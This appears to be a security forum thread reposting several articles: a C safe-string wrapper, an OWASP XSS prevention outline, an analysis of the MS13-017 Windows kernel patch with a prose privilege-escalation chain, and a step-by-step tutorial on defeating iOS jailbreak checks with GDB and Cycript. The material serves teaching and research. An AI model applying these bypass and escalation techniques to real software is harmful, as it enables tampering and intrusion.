help. I’ve seen developers pass hard-coded constants (the wrong ones), pass named constants (the wrong ones), used sizeof(the wrong buffer), or use sizeof on a wchar_t array (thus getting a byte count instead of character count). I even saw one piece of code where the address of the string was passed instead of the size, and due to a mixture of templates and casting it actually compiled! Passing sizeof() to a function that expects a character count is the most common failure, but they all happen – even snprintf and strlcpy are misused. Using annotations and /analyze can help catch these problems, but we can do so much better. The solution is… We are programmers, are we not? If the functions we are given to deal with strings are difficult to use correctly then we should write new ones. And it turns out it is easy. Here I present to you the safest way to copy a string to an array: [INDENT]template <size_t charCount> void strcpy_safe(char (&output)[charCount], const char* pSrc) { // Copy the string — don’t copy too many bytes. strncpy(output, pSrc, charCount); // Ensure null-termination. output[charCount - 1] = 0; } // Call it like this: char buffer[5]; strcpy_safe(buffer, “Thisisalongstring”); [/INDENT] I challenge you to use this function incorrectly. You can make it crash by passing an invalid source pointer, but in many years of using this technique I have never seen a case where the buffer size was not inferred correctly. If you pass a pointer as the destination then, because the size cannot be inferred, the code will fail to compile. I think that strcpy_safe is (ahem) a perfect function. It is either used correctly, or it fails to compile. It. Is Perfect. And it’s only six lines. Five if you indent like K&R. Because strcpy_safe is so tiny – it just calls strncpy and then stores a zero – it will inline automatically in VC++ and should generate identical code to if you manually called strncpy and then null-terminated. If you want gcc to inline it you will need __attribute__((always_inline)). Either way, if you want to reduce code size further you could write a non-inline helper function (strlcpy?) that would do the null-termination and have strcpy_safe call this function. It’s up to you. One could certainly debate the name – maybe you would rather call it acme_strcpy, or acme_strncpy_safe. I really don’t care. You could even call it strcpy and let template overloading magically improve the safety of your code. Extrapolation Similar wrappers can obviously be made for all of the string functions that you use. You can even invent new ones, like sprintf_cat_safe. In fact, when I write a member function that takes a pointer and a size I usually make it private and write a template wrapper to handle the size. It’s a versatile technique that you should get used to using. Templates aren’t just for writing unreadable meta-code. String classes Yes, to be clear, I am aware of the existence of std::string. For better or for worse most game developers try to avoid dynamically allocated memory and std::string generally implies just that. There are (somewhat) valid reasons to use string buffers, even if those valid reasons are just that you’ve been handed a million lines of legacy code with security and reliability problems in all directions. Summary We started with this code – two lines of error prone verbosity: [INDENT]strncpy(buffer, “Thisisalongstring”, sizeof(buffer)); buffer[sizeof(buffer)-1] = 0; [/INDENT] We ended with this code – simpler, and impossible to get wrong: [INDENT]strcpy_safe(buffer, “Thisisalongstring”); [/INDENT] You should be using the second option, or explain to me why the heck not. It is constructive laziness of the highest order. Doing less typing in order to create code that is less fragile seems like it just might be a good idea. Sursa: Stop using strncpy already! | Random ASCII
-
[h=1]XSS (Cross Site Scripting) Prevention Cheat Sheet[/h] [h=2]Contents[/h] [hide] 1 Introduction 1.1 A Positive XSS Prevention Model 1.2 Why Can't I Just HTML Entity Encode Untrusted Data? 1.3 You Need a Security Encoding Library [*]2 XSS Prevention Rules 2.1 RULE #0 - Never Insert Untrusted Data Except in Allowed Locations 2.2 RULE #1 - HTML Escape Before Inserting Untrusted Data into HTML Element Content 2.3 RULE #2 - Attribute Escape Before Inserting Untrusted Data into HTML Common Attributes 2.4 RULE #3 - JavaScript Escape Before Inserting Untrusted Data into JavaScript Data Values 2.4.1 RULE #3.1 - HTML escape JSON values in an HTML context and read the data with JSON.parse [*]2.5 RULE #4 - CSS Escape And Strictly Validate Before Inserting Untrusted Data into HTML Style Property Values [*]2.6 RULE #5 - URL Escape Before Inserting Untrusted Data into HTML URL Parameter Values [*]2.7 RULE #6 - Use an HTML Policy engine to validate or clean user-driven HTML in an outbound way [*]2.8 RULE #7 - Prevent DOM-based XSS [*]2.9 Bonus Rule: Use HTTPOnly cookie flag [*]3 XSS Prevention Rules Summary [*]4 Output Encoding Rules Summary [*]5 Related Articles [*]6 Authors and Primary Editors [*]7 Other Cheatsheets Link: https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
-
[h=2]MS13-017 – The harmless silent patch…[/h] Hi, in this blog post I’m going to discuss a silent patch published by Microsoft on 12th February 2013 (Microsoft Security Bulletin MS13-017 - Important : Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2799494)). Even though this bug was patched the previous patch Tuesday, I think that it is interesting to analyze and show the relationship between the ROM BIOS and Windows. [h=2]Diffing the Patch:[/h] According to the Microsoft description, we are told that 3 vulnerabilities were addressed by this patch: Kernel Race Condition Vulnerability – CVE-2013-1278 Kernel Race Condition Vulnerability – CVE-2013-1279 Windows Kernel Reference Count Vulnerability – CVE-2013-1280 The files that were modified are “ntoskrnl.exe” and “ntkrnlpa.exe”. In general, I always analyze the changes between Windows XP and Windows 7, because the changed functions aren’t always the same. When I did the binary diffing in Windows XP ( and also in Windows 2003 ) between the vulnerable version of “ntkrnlpa.exe” ( 5.1.2600.6284 ) and the patched version of “ntkrnlpa.exe” ( 5.1.2600.6335 ) I only found one change, the “VdmpInitialize” function. After looking at the binary diffing results and analyzing the changes made in this function, I realized that it was very different from what Microsoft reported… [h=2]The changed function:[/h] As I said before, the changed function is “VdmpInitialize”. This function is called when the “ntvdm.exe” process is invoked by the operating system when a 16 bit application is executed by a user. Essentially, this function is responsible for mapping part of the ROM BIOS in user space to the first megabyte of the “ntvdm.exe” process memory, creating the right context for a 16 bit process. When a 16 bits process calls BIOS interrupts, the ROM BIOS code (now in the user space memory) is executed. An interesting detail of this is that the copied memory by the “VdmpInitialize” function is really the memory mapped in the physical address space located between c000:0000 to f000:ffff. It means that if the mapped code located in this memory address was modified, for example by a ROOTKIT, it could be executed by a 16 bit application when it is launched. [h=2]The bug:[/h] The vulnerability is linked with a Windows registry key called “Configuration Data” located in “HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System”. This key is used by Windows kernel through the “VdmpInitialize” function, looking at the key value through the “Modify Binary Data” option in regedit program, we can see something like this: In the selected area, there is a list with pair of values representing: ADDRESS – LENGTH Among some values, we can see this: VGA ROM: 00 00 0C 00 –> 0x000C0000 (BLOCK ADDRESS) 00 80 00 00 –> 0×00008000 (BLOCK LENGTH) ROM BIOS: 00 00 0F 00 –> 0x000F0000 (BLOCK ADDRESS) 00 00 01 00 –> 0×00010000 (BLOCK LENGTH) These values are loaded by “VdmpInitialize” function, finalizing the process with data copied from the PHYSICAL MEMORY (only accessible by kernel) to the memory space of the “ntvdm.exe” process. The destination address of the copied data is the same as the original ROM BIOS address but the difference is that it’s virtual memory, NOT PHYSICAL MEMORY. As example of this, we can see how the key values are used as parameters to copy memory from the VGA ROM BIOS: –> memcpy (0xc0000, SOME_VIRTUAL_ADDRESS, 0×8000); Now, if we look part of the patched function code: [TABLE] [TR] [TD=width: 319] [/TD] [TD=width: 319] [/TD] [/TR] [/TABLE] We can see that the comparison “if (_VdmMapBiosRomReadWrite = 1)” was moved. In the patched function, the code checks: - if (BLOCK ADDRESS >= BASE_ROM_BIOS_ADDRESS (0xc0000)) - if (BASE_ROM_BIOS_ADDRESS – BLOCK ADDRESS > BLOCK ADDRESS) If all is OK, the comparison “if (_VdmMapBiosRomReadWrite = 1)” is executed. In the unpatched function, there are the same checks but they are only executed when the condition “if (_VdmMapBiosRomReadWrite = 1)” is TRUE. It is because the “IF” sentence is put in a wrong place. So, if the comparison fails, checks will never be made. At least in my virtual machine, the value of the variable “_VdmMapBiosRomReadWrite” is FALSE. The interesting detail of that is not exactly this bug, if not what the “VdmpInitialize” function does. Remember that the “VdmpInitialize” function uses value pairs (BLOCK ADDRESS – BLOCK LENGTH) to build the ntvdm.exe memory context and these value pairs are located in the Windows registry, so, they can be modified. So, we can change the BLOCK ADDRESS value in the registry key and the function will read physical memory from another area. As example, we could read some parts of Windows KERNEL and map them in USER space memory, in this case in the “ntvdm.exe” process. On the other hand, if we change the LENGTH of the data to copy, we could read big quantities of physical memory. Now, the only way to change the registry key value (unless I’m missing something) is as an administrator user, which it converts the bug in somewhat unattractive, because if we are an administrator user, why would we need more? [h=2]ROM BIOS and Windows:[/h] Apparently, this bug doesn’t represent any problem for users, but the access to the PHYSICAL MEMORY where the ROM BIOS is mapped has deeper implications. A year ago, VMware published an advisory called “VMware High-Bandwidth Backdoor ROM Overwrite Privilege Elevation” (Microsoft Windows and VMware ESXi/ESX CVE-2012-1515 Local Privilege Escalation Vulnerability). In summary, the patch published by VMware allows us to modify the virtual machine ROM BIOS memory area in runtime and finish it with a privilege escalation exploit within the virtual machine. If the ROM BIOS is modified, in this case could be the VGA ROM BIOS, the malicious code could be executed calling interruption number 0×10 ( INT 10h ). In Windows XP/Windows 2003, the BIOS interruption 10h can be invoked from a windows console changing de video mode to FULL-SCREEN. A possible result is malicious code running in VM86 mode (Virtual mode 8086) within of the CSRSS.EXE process. Now, according to the VMware advisory and the tests that I carried out myself, it’s possible to get away from the VM86 mode overwriting a table called “VDM TIB” located from the 1200h:0000h memory address (or 0×12000 linear value). The complete exploitation process could be: Through a bug, to overwrite the memory area where the ROM BIOS is mapped (we could use the “INT 10h” handler). Modify part of the CSRSS.EXE process memory can produces the same results (only Windows XP/Windows 2003). Invoke the “INT 10h” handler changing the console video mode to FULL-SCREEN. Running in VM86 mode within CSRSS process, to modify the VDM TIB structure. When the “INT 10h” returns, take control of the CSRSS.EXE process jumping to 32 bits code. [h=2]Final thoughts:[/h] Microsoft decided not to talk about this function and not to assign a CVE for this vulnerability, maybe because they determined that it is not a security vulnerability. However, they decided to patch function, I suppose that there must have been a reason – if anyone has any theories I would love to hear them. - Nicolas Economou, Senior Exploit Writer, CORE Labs To comment on this post, please CLICK HERE Penetration Testing Overview Sursa: MS13-017 - The harmless silent patch... | Core Security
-
[h=1]Wi-Fi SSID Sniffer in 11 Lines of Python using Raw Sockets[/h] Publicat la 03.04.2013 Full information and source code download link: [Hack Of The Day Ep. 10] Wlan Ssid Sniffer Using Raw Sockets In Python Please post comments on the link above so we can respond to them. Thanks! If you are interested in learning how to use Python for Pentesting, please have a look at our course taken by students from 73+ countries as of this writing: http://securitytube-training.com/cert...
-
[h=1]Security Engineering — The Book[/h] The first edition (2001) You can also download all of the first edition for free: The foreword, preface and other front matter What is Security Engineering? Protocols Passwords Access Control Cryptography Distributed Systems Multilevel Security Multilateral Security Banking and Bookkeeping Monitoring Systems Nuclear Command and Control Security Printing and Seals Biometrics Physical Tamper Resistance Emission Security Electronic and Information Warfare Telecom System Security Network Attack and Defense Protecting E-Commerce Systems Copyright and Privacy Protection E-Policy Management Issues System Evaluation and Assurance Conclusions Bibliography Finally, here's a single pdf of the whole book. It's 17Mb, but a number of people asked me for it. All chapters from the second edition now available free online! Table of contents Preface Acknowledgements Chapter 1: What is Security Engineering? Chapter 2: Usability and Psychology Chapter 3: Protocols Chapter 4: Access Control Chapter 5: Cryptography Chapter 6: Distributed Systems Chapter 7: Economics Chapter 8: Multilevel Security Chapter 9: Multilateral Security Chapter 10: Banking and Bookkeeping Chapter 11: Physical Protection Chapter 12: Monitoring and Metering Chapter 13: Nuclear Command and Control Chapter 14: Security Printing and Seals Chapter 15: Biometrics Chapter 16: Physical Tamper Resistance Chapter 17: Emission Security Chapter 18: API Security Chapter 19: Electronic and Information Warfare Chapter 20: Telecom System Security Chapter 21: Network Attack and Defence Chapter 22: Copyright and DRM Chapter 23: The Bleeding Edge Chapter 24: Terror, Justice and Freedom Chapter 25: Managing the Development of Secure Systems Chapter 26: System Evaluation and Assurance Chapter 27: Conclusions Bibliography Index Sursa: Security Engineering - A Guide to Building Dependable Distributed Systems
-
Bypassing Jailbroken Checks in iOS Applications using GDB and Cycript I've been teaching iOS Application Security and Auditing to pentesters and developers (secure programming guidelines) online / real world and one of the questions which always comes up is can Anti-Piracy measures work if implemented in the application? Pentesters want to know if they could run into problems with applications implementing runtime protections. Developers on the other hand, want to know if they can sleep well if they implement such protections. The short answer is NO, if your code runs on a platform controlled by the attacker, and if he is skilled enough, he would eventually figure out how to subvert your protection. This is especially true for a Jailbroken device where the attacker can pretty much run anything. I can already see pentesters smiling If you know how to do runtime analysis using Cycript and GDB, then you should be able to subvert most protections. However, as this is significantly different from other application pentests (web and network) and involves a component of reverse engineering an application on the ARM platform, this might get interesting and challenging! This blog post is the first in the series I am planning to talk about the common techniques used by developers today to check for jailbreaking and how an attacker could subvert them. In order to try things out and we need a sample application! I've created a simple AntiPiracyDemo Application for iOS which I use for my online iOS course. You can download the IPA here. Please note that this is a self-signed application and would require a Jailbroken device (iPhone / iPad) to run. You can install the application using installipa as shown below: The application has been tested on iOS 5.1.1 and 6.1.2. Once you run the application, you can confronted with a simple screen to check for Jailbroken state: Clicking on the button, confirms this application is running on a Jailbroken phone. The developer of a real world application can now exit or send a report (privacy violation? ) back to his server to notify. Objective: To bypass the is Jailbroken check implemented by the iOS Application Step 1: Find the application PID and the directory in which it is installed. This is easy to do using "ps" along with a "grep" for the application name Step 2: Go to the Application directory and locate the actually application binary Step 3: Native iOS applications are written in Objective-C which is a dynamically typed language. This requires that all the class information be available at runtime and hence is embedded into the binary. We can extract this class information using a tool called class-dump-z as show below: Step 4: View the class information file - there is a ton of information in there! Step 5: We need to find the rootViewController for the current window. This can be done using a tool called Cycript, which uses Mobile Substrate to hook into any running application. We can find the current rootViewController as below: Step 6: Lets go back to the out of class-dump-z in Step 4 and find the "@interface" section for AntiPiracyViewController Step 7: We see a "checkPiracy" method and more interestingly - we see a method called "isJailbroken" which returns a BOOL and takes no inputs which probably means this checks for a jailbroken state. We can use 2 different techniques to bypass this protection -- 1. Runtime Modification using GDB 2. Method Swizzling using Cycript Let's take up Runtime Modification using GDB first Step 1: Attach GDB to AntiPiracyDemo using the PID Step 2: Set a Breakpoint for the isJailbroken Step 3: Continue running the application and then click on the "Am I Pirated" button to see if we hit the breakpoint Step 4: Disassemble! Be Prepared for some unfamiliar looking symbols if ARM Assembly is not your thing Step 5: iOS devices have an ARM based processor and what you are seeing is ARM Assembly. If you are from the x86 world then there is only one thing you need to keep in mind when working with ARM assembly - the arguments are passed via the registers R0, R1, R2, R3. More than 4 arguments are passed on the stack. Here is the ABI document if you are interested. Step 6: In the disassembly in Step 4, you see a lot of "blx 0x98fe4 <dyld_stub_objc_msgSend>" BLX is "Branch with Link" which basically ends up calling objc_msgSend which has the following definition: The abve is the from Apple Developer site. Objc_msgSend is really the "carrier" of all messages inside an iOS application. Using the ABI we can conclude that: theReceiver would be pointed to by R0 theSelector would be pointed to by R1 First argument pointed to by R2 Step 7: We could set a breakpoint for objc_msgSend but I would prefer to add breakpoints in all locations its called to better illustrate the concept. So, let's set the breakpoints: Step 8: Let's continue running the application and let's dump R0/R1 when we hit the Breakpoint 2. This will help us understand the receiver of the message and its respective selector NSSString alloc is not interesting, Let's repeat the same for other breakpoints. Below is the output when we hit Breakpoints 4 and 5. Breakpoint 4 tells us that the application is using NSFileManager and Breakpoint 5 tells us it is checking for "FileExistsAtPath:" for "/private/var/lib/apt" Very interesting! APT is probably is one of the first binaries to be installed on a Jailbroken phone to manage packages from Cydia. Looks like the developer is checking for the presence of this binary. Step 9: So where do we go from here? The return value is stored in R0 and if you check the documentation of NSFileManager FileExistsAtPath it returns a BOOL. This means "0" will be returned in case the device is NOT Jailbroken and "1" will be returned if it IS Jailbroken. In our case, as our iPhone is jailbroken, it will return "1". We can verify this by setting a breakpoint in the next line of code and checking the value of R0 as below: Step 10: The easiest way to subvert this mechanism would be to change the value of R0 from "1" to "0" so that it indicates to the application that the APT does not exists and hence the device is not Jailbroken. We can do this very easily: Step 11: If we check the Application now - it happily tells us that "This iPhone is NOT Jailbroken" Of course, we have not patched the check in the binary so you would need do this every time I will take up Application Patching in another blog post. Now let us look at the other technique - Method Swizzling using Cycript Step 1: Attack to the application using Cycript Step 2: Method Swizzling allows you to change the mapping for a given method to your own implementation of it. To get the list of messages available we use isa.messages The above command should give you a ton of output! You can clearly see isJailbroken is there in it as highlighted. What is really isa.messages? If you look at the Objective-C runtime implementation, then isa is really a pointer to the class structure itself. Implementation File: runtime.h isa is never exposed to the programmer directly but with Cycript we are able to access it. Quoting from Apple's website: If you’re a procedural programmer new to object-oriented concepts, it might help at first to think of an object as essentially a structure with functions associated with it. This notion is not too far off the reality, particularly in terms of runtime implementation. Every Objective-C object hides a data structure whose first member—or instance variable—is the isa pointer. (Most remaining members are defined by the object’s class and superclasses.) The isa pointer, as the name suggests, points to the object’s class, which is an object in its own right (see Figure 2-1) and is compiled from the class definition. The class object maintains a dispatch table consisting essentially of pointers to the methods it implements; it also holds a pointer to its superclass, which has its own dispatch table and superclass pointer. Through this chain of references, an object has access to the method implementations of its class and all its superclasses (as well as all inherited public and protected instance variables). The isa pointer is critical to the message-dispatch mechanism and to the dynamism of Cocoa objects. Please read the rest here: https://developer.apple.com/library/mac/#documentation/Cocoa/Conceptual/CocoaFundamentals/CocoaObjects/CocoaObjects.html The last line of the above excerpt summarizes the importance of isa in message dispatching. Here is more information on it: The key to messaging lies in the structures that the compiler builds for each class and object. Every class structure includes these two essential elements: A pointer to the superclass. A class dispatch table. This table has entries that associate method selectors with the class-specific addresses of the methods they identify. Full Details here: https://developer.apple.com/library/mac/#documentation/Cocoa/Conceptual/ObjCRuntimeGuide/Articles/ocrtHowMessagingWorks.html Step 3: It's OK if the above does not make any sense but it's good to know what is really happening in the background. Now let's change the implementation of isJailbroken with Cycript Step 4: Now when you try Clicking on "Am I Pirated?" you will always get a "NO" W00t Hope you enjoyed this post. I will creating more posts on Bypassing more checks like Binary checks, Bundle and Hash checks etc. in coming posts. Stay tuned! If you are interested in learning how to methodically understand many of the above concepts and test iOS applications with a blackbox approach, then please have a look at my SecurityTube iOS Security Expert (SISE) is an online course and certification which focuses on the iOS platform and application security. This course is ideal for pentesters, researchers and the casual iOS enthusiast who would like to dive deep and understand how to analyze and systematically audit applications on this platform using a variety of bleeding edge tools and technique. Posted by Vivek Ramachandran Sursa: SecurityTube.net Hack of the Day: Bypassing Jailbroken Checks in iOS Applications using GDB and Cycript